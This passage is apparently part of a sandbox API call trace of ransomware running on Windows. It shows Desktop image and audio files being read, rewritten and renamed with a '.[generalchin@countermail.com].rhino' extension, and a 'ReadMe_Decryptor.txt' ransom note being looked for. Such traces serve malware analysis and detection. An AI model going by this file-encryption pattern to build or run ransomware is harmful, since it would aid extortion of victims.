dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0083.152] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x6eba00 | out: hHeap=0x6d0000) returned 1 [0083.152] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\XDsNA6J.bmp" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\xdsna6j.bmp"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x124 [0083.153] GetFileSize (in: hFile=0x124, lpFileSizeHigh=0x4af30c | out: lpFileSizeHigh=0x4af30c*=0x0) returned 0x17e77 [0083.153] LockFile (hFile=0x124, dwFileOffsetLow=0x0, dwFileOffsetHigh=0x0, nNumberOfBytesToLockLow=0x17f97, nNumberOfBytesToLockHigh=0x0) returned 1 [0083.153] SetFilePointerEx (in: hFile=0x124, liDistanceToMove=0xffffffe0, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0083.153] ReadFile (in: hFile=0x124, lpBuffer=0x4af2cc, nNumberOfBytesToRead=0x20, lpNumberOfBytesRead=0x4af2ac, lpOverlapped=0x0 | out: lpBuffer=0x4af2cc*, lpNumberOfBytesRead=0x4af2ac*=0x20, lpOverlapped=0x0) returned 1 [0083.154] SetFilePointerEx (in: hFile=0x124, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0083.154] ReadFile (in: hFile=0x124, lpBuffer=0x3110040, nNumberOfBytesToRead=0x17e77, lpNumberOfBytesRead=0x4af2ac, lpOverlapped=0x0 | out: lpBuffer=0x3110040*, lpNumberOfBytesRead=0x4af2ac*=0x17e77, lpOverlapped=0x0) returned 1 [0083.155] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x4) returned 0x6f5760 [0083.155] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x6f5760 | out: hHeap=0x6d0000) returned 1 [0083.155] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x2c) returned 0x715080 [0083.155] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x40) returned 0x6e6b00 [0083.155] GetLastError () returned 0x0 [0083.156] SetLastError (dwErrCode=0x0) [0083.156] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x715080 | out: hHeap=0x6d0000) returned 1 [0083.156] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x17e9a) returned 0x2230048 [0083.158] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x6e6b00 | out: hHeap=0x6d0000) returned 1 [0083.158] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x100) returned 0x703e78 [0083.159] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x180) returned 0x703f80 [0083.159] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x703e78 | out: hHeap=0x6d0000) returned 1 [0083.159] SetFilePointerEx (in: hFile=0x124, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0083.159] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x1) returned 0x6f5760 [0083.159] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x2) returned 0x6f5750 [0083.159] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x6f5760 | out: hHeap=0x6d0000) returned 1 [0083.159] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x3) returned 0x6f5760 [0083.159] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x6f5750 | out: hHeap=0x6d0000) returned 1 [0083.159] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x4) returned 0x6f5750 [0083.159] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x6f5760 | out: hHeap=0x6d0000) returned 1 [0083.159] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x6) returned 0x6f5760 [0083.159] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x6f5750 | out: hHeap=0x6d0000) returned 1 [0083.159] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x9) returned 0x714188 [0083.159] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x6f5760 | out: hHeap=0x6d0000) returned 1 [0083.159] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0xd) returned 0x714170 [0083.159] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x714188 | out: hHeap=0x6d0000) returned 1 [0083.159] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x13) returned 0x709f08 [0083.159] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x714170 | out: hHeap=0x6d0000) returned 1 [0083.159] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x1c) returned 0x713d48 [0083.159] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x709f08 | out: hHeap=0x6d0000) returned 1 [0083.159] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x2a) returned 0x715080 [0083.159] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x713d48 | out: hHeap=0x6d0000) returned 1 [0083.159] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x3f) returned 0x6e6b00 [0083.159] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x715080 | out: hHeap=0x6d0000) returned 1 [0083.159] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x5e) returned 0x6f36d0 [0083.160] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x6e6b00 | out: hHeap=0x6d0000) returned 1 [0083.160] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x8d) returned 0x703e78 [0083.160] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x6f36d0 | out: hHeap=0x6d0000) returned 1 [0083.160] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0xd3) returned 0x721c20 [0083.160] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x703e78 | out: hHeap=0x6d0000) returned 1 [0083.160] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x13c) returned 0x721d00 [0083.160] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x721c20 | out: hHeap=0x6d0000) returned 1 [0083.160] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x1da) returned 0x714b90 [0083.160] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x721d00 | out: hHeap=0x6d0000) returned 1 [0083.160] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x2c7) returned 0x721c20 [0083.160] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x714b90 | out: hHeap=0x6d0000) returned 1 [0083.160] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x42a) returned 0x75b0d8 [0083.160] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x721c20 | out: hHeap=0x6d0000) returned 1 [0083.160] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x63f) returned 0x6f45b8 [0083.160] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x75b0d8 | out: hHeap=0x6d0000) returned 1 [0083.160] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x95e) returned 0x717898 [0083.160] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x6f45b8 | out: hHeap=0x6d0000) returned 1 [0083.160] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0xe0d) returned 0x718200 [0083.160] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x717898 | out: hHeap=0x6d0000) returned 1 [0083.160] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x1536) returned 0x6ee498 [0083.161] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x718200 | out: hHeap=0x6d0000) returned 1 [0083.161] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x1fbf) returned 0x6ef9d8 [0083.161] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x6ee498 | out: hHeap=0x6d0000) returned 1 [0083.161] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x2f8d) returned 0x2247ef0 [0083.161] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x6ef9d8 | out: hHeap=0x6d0000) returned 1 [0083.161] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x4742) returned 0x224ae88 [0083.161] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x2247ef0 | out: hHeap=0x6d0000) returned 1 [0083.161] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x6ad1) returned 0x744cd8 [0083.161] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x224ae88 | out: hHeap=0x6d0000) returned 1 [0083.162] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0xa028) returned 0x2247ef0 [0083.162] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x744cd8 | out: hHeap=0x6d0000) returned 1 [0083.162] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0xf02a) returned 0x744cd8 [0083.162] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x2247ef0 | out: hHeap=0x6d0000) returned 1 [0083.162] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x1682d) returned 0x7630c0 [0083.165] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x744cd8 | out: hHeap=0x6d0000) returned 1 [0083.166] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x21c32) returned 0x7798f8 [0083.383] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x7630c0 | out: hHeap=0x6d0000) returned 1 [0083.383] WriteFile (in: hFile=0x124, lpBuffer=0x779900*, nNumberOfBytesToWrite=0x17f97, lpNumberOfBytesWritten=0x4af2ac, lpOverlapped=0x0 | out: lpBuffer=0x779900*, lpNumberOfBytesWritten=0x4af2ac*=0x17f97, lpOverlapped=0x0) returned 1 [0083.384] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x7798f8 | out: hHeap=0x6d0000) returned 1 [0083.384] UnlockFile (hFile=0x124, dwFileOffsetLow=0x0, dwFileOffsetHigh=0x0, nNumberOfBytesToUnlockLow=0x17f97, nNumberOfBytesToUnlockHigh=0x0) returned 1 [0083.384] CloseHandle (hObject=0x124) returned 1 [0083.385] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x70) returned 0x6fac68 [0083.386] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0xb0) returned 0x6e9730 [0083.386] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x6fac68 | out: hHeap=0x6d0000) returned 1 [0083.386] MoveFileExW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\XDsNA6J.bmp" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\xdsna6j.bmp"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\XDsNA6J.bmp.[generalchin@countermail.com].rhino" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\xdsna6j.bmp.[generalchin@countermail.com].rhino"), dwFlags=0x2) returned 1 [0083.387] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x6e9730 | out: hHeap=0x6d0000) returned 1 [0083.387] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x703f80 | out: hHeap=0x6d0000) returned 1 [0083.387] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x2230048 | out: hHeap=0x6d0000) returned 1 [0083.387] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x50) returned 0x6f6970 [0083.387] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x6f69c8 | out: hHeap=0x6d0000) returned 1 [0083.387] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x50) returned 0x6f69c8 [0083.387] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x80) returned 0x6eba00 [0083.387] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x6f69c8 | out: hHeap=0x6d0000) returned 1 [0083.387] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\ReadMe_Decryptor.txt" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\readme_decryptor.txt"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0083.387] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x6eba00 | out: hHeap=0x6d0000) returned 1 [0083.387] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\ZglJ57aMYpZ9P7pLlRh.png" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\zglj57amypz9p7pllrh.png"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x124 [0083.387] GetFileSize (in: hFile=0x124, lpFileSizeHigh=0x4af30c | out: lpFileSizeHigh=0x4af30c*=0x0) returned 0x1559c [0083.388] LockFile (hFile=0x124, dwFileOffsetLow=0x0, dwFileOffsetHigh=0x0, nNumberOfBytesToLockLow=0x156bc, nNumberOfBytesToLockHigh=0x0) returned 1 [0083.388] SetFilePointerEx (in: hFile=0x124, liDistanceToMove=0xffffffe0, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0083.388] ReadFile (in: hFile=0x124, lpBuffer=0x4af2cc, nNumberOfBytesToRead=0x20, lpNumberOfBytesRead=0x4af2ac, lpOverlapped=0x0 | out: lpBuffer=0x4af2cc*, lpNumberOfBytesRead=0x4af2ac*=0x20, lpOverlapped=0x0) returned 1 [0083.389] SetFilePointerEx (in: hFile=0x124, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0083.390] ReadFile (in: hFile=0x124, lpBuffer=0x3110040, nNumberOfBytesToRead=0x1559c, lpNumberOfBytesRead=0x4af2ac, lpOverlapped=0x0 | out: lpBuffer=0x3110040*, lpNumberOfBytesRead=0x4af2ac*=0x1559c, lpOverlapped=0x0) returned 1 [0083.391] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x4) returned 0x6f5760 [0083.391] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x6f5760 | out: hHeap=0x6d0000) returned 1 [0083.391] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x2c) returned 0x715080 [0083.391] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x40) returned 0x6e6b00 [0083.391] GetLastError () returned 0x0 [0083.391] SetLastError (dwErrCode=0x0) [0083.391] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x715080 | out: hHeap=0x6d0000) returned 1 [0083.391] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x155bf) returned 0x744cd8 [0083.393] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x6e6b00 | out: hHeap=0x6d0000) returned 1 [0083.393] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x100) returned 0x703e78 [0083.393] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x180) returned 0x703f80 [0083.393] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x703e78 | out: hHeap=0x6d0000) returned 1 [0083.393] SetFilePointerEx (in: hFile=0x124, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0083.393] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x1) returned 0x6f5760 [0083.393] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x2) returned 0x6f5750 [0083.393] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x6f5760 | out: hHeap=0x6d0000) returned 1 [0083.393] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x3) returned 0x6f5760 [0083.393] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x6f5750 | out: hHeap=0x6d0000) returned 1 [0083.393] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x4) returned 0x6f5750 [0083.393] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x6f5760 | out: hHeap=0x6d0000) returned 1 [0083.393] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x6) returned 0x6f5760 [0083.393] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x6f5750 | out: hHeap=0x6d0000) returned 1 [0083.393] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x9) returned 0x714170 [0083.393] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x6f5760 | out: hHeap=0x6d0000) returned 1 [0083.393] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0xd) returned 0x714188 [0083.393] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x714170 | out: hHeap=0x6d0000) returned 1 [0083.394] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x13) returned 0x709f08 [0083.394] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x714188 | out: hHeap=0x6d0000) returned 1 [0083.394] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x1c) returned 0x713d48 [0083.394] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x709f08 | out: hHeap=0x6d0000) returned 1 [0083.394] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x2a) returned 0x715080 [0083.394] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x713d48 | out: hHeap=0x6d0000) returned 1 [0083.394] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x3f) returned 0x6e6b00 [0083.394] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x715080 | out: hHeap=0x6d0000) returned 1 [0083.394] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x5e) returned 0x6f36d0 [0083.394] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x6e6b00 | out: hHeap=0x6d0000) returned 1 [0083.394] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x8d) returned 0x703e78 [0083.394] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x6f36d0 | out: hHeap=0x6d0000) returned 1 [0083.394] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0xd3) returned 0x721c20 [0083.394] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x703e78 | out: hHeap=0x6d0000) returned 1 [0083.394] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x13c) returned 0x721d00 [0083.394] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x721c20 | out: hHeap=0x6d0000) returned 1 [0083.394] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x1da) returned 0x714b90 [0083.394] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x721d00 | out: hHeap=0x6d0000) returned 1 [0083.394] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x2c7) returned 0x721c20 [0083.394] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x714b90 | out: hHeap=0x6d0000) returned 1 [0083.394] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x42a) returned 0x75b0d8 [0083.395] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x721c20 | out: hHeap=0x6d0000) returned 1 [0083.395] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x63f) returned 0x6f45b8 [0083.395] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x75b0d8 | out: hHeap=0x6d0000) returned 1 [0083.395] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x95e) returned 0x75a2a0 [0083.395] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x6f45b8 | out: hHeap=0x6d0000) returned 1 [0083.395] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0xe0d) returned 0x717898 [0083.395] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x75a2a0 | out: hHeap=0x6d0000) returned 1 [0083.395] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x1536) returned 0x7186b0 [0083.395] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x717898 | out: hHeap=0x6d0000) returned 1 [0083.395] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x1fbf) returned 0x6ee498 [0083.395] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x7186b0 | out: hHeap=0x6d0000) returned 1 [0083.395] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x2f8d) returned 0x2230048 [0083.395] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x6ee498 | out: hHeap=0x6d0000) returned 1 [0083.395] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x4742) returned 0x2232fe0 [0083.395] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x2230048 | out: hHeap=0x6d0000) returned 1 [0083.395] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x6ad1) returned 0x2237730 [0083.395] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x2232fe0 | out: hHeap=0x6d0000) returned 1 [0083.400] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0xa028) returned 0x223e210 [0083.401] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x2237730 | out: hHeap=0x6d0000) returned 1 [0083.402] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0xf02a) returned 0x7630c0 [0083.405] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x223e210 | out: hHeap=0x6d0000) returned 1 [0083.406] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x1682d) returned 0x2230048 [0083.406] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x7630c0 | out: hHeap=0x6d0000) returned 1 [0083.406] WriteFile (in: hFile=0x124, lpBuffer=0x2230060*, nNumberOfBytesToWrite=0x156bc, lpNumberOfBytesWritten=0x4af2ac, lpOverlapped=0x0 | out: lpBuffer=0x2230060*, lpNumberOfBytesWritten=0x4af2ac*=0x156bc, lpOverlapped=0x0) returned 1 [0083.407] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x2230048 | out: hHeap=0x6d0000) returned 1 [0083.407] UnlockFile (hFile=0x124, dwFileOffsetLow=0x0, dwFileOffsetHigh=0x0, nNumberOfBytesToUnlockLow=0x156bc, nNumberOfBytesToUnlockHigh=0x0) returned 1 [0083.407] CloseHandle (hObject=0x124) returned 1 [0083.409] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x80) returned 0x6eba00 [0083.409] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0xd0) returned 0x6f9208 [0083.409] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x6eba00 | out: hHeap=0x6d0000) returned 1 [0083.409] MoveFileExW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\ZglJ57aMYpZ9P7pLlRh.png" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\zglj57amypz9p7pllrh.png"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\ZglJ57aMYpZ9P7pLlRh.png.[generalchin@countermail.com].rhino" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\zglj57amypz9p7pllrh.png.[generalchin@countermail.com].rhino"), dwFlags=0x2) returned 1 [0083.410] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x6f9208 | out: hHeap=0x6d0000) returned 1 [0083.410] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x703f80 | out: hHeap=0x6d0000) returned 1 [0083.410] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x744cd8 | out: hHeap=0x6d0000) returned 1 [0083.410] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x50) returned 0x6f69c8 [0083.410] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x6f6970 | out: hHeap=0x6d0000) returned 1 [0083.410] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x50) returned 0x6f6970 [0083.410] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x80) returned 0x6eba00 [0083.410] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x6f6970 | out: hHeap=0x6d0000) returned 1 [0083.410] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\ReadMe_Decryptor.txt" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\readme_decryptor.txt"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0083.410] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x6eba00 | out: hHeap=0x6d0000) returned 1 [0083.410] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\zPsVUyevGQ4FW.m4a" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\zpsvuyevgq4fw.m4a"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x124 [0083.411] GetFileSize (in: hFile=0x124, lpFileSizeHigh=0x4af30c | out: lpFileSizeHigh=0x4af30c*=0x0) returned 0x158f0 [0083.411] LockFile (hFile=0x124, dwFileOffsetLow=0x0, dwFileOffsetHigh=0x0, nNumberOfBytesToLockLow=0x15a10, nNumberOfBytesToLockHigh=0x0) returned 1 [0083.411] SetFilePointerEx (in: hFile=0x124, liDistanceToMove=0xffffffe0, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0083.411] ReadFile (in: hFile=0x124, lpBuffer=0x4af2cc, nNumberOfBytesToRead=0x20, lpNumberOfBytesRead=0x4af2ac, lpOverlapped=0x0 | out: lpBuffer=0x4af2cc*, lpNumberOfBytesRead=0x4af2ac*=0x20, lpOverlapped=0x0) returned 1 [0083.412] SetFilePointerEx (in: hFile=0x124, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0083.413] ReadFile (in: hFile=0x124, lpBuffer=0x3110040, nNumberOfBytesToRead=0x158f0, lpNumberOfBytesRead=0x4af2ac, lpOverlapped=0x0 | out: lpBuffer=0x3110040*, lpNumberOfBytesRead=0x4af2ac*=0x158f0, lpOverlapped=0x0) returned 1 [0083.414] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x4) returned 0x6f5760 [0083.414] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x6f5760 | out: hHeap=0x6d0000) returned 1 [0083.414] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x2c) returned 0x715080 [0083.414] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x40) returned 0x6e6b00 [0083.414] GetLastError () returned 0x0 [0083.414] SetLastError (dwErrCode=0x0) [0083.414] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x715080 | out: hHeap=0x6d0000) returned 1 [0083.414] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x15913) returned 0x744cd8 [0083.415] 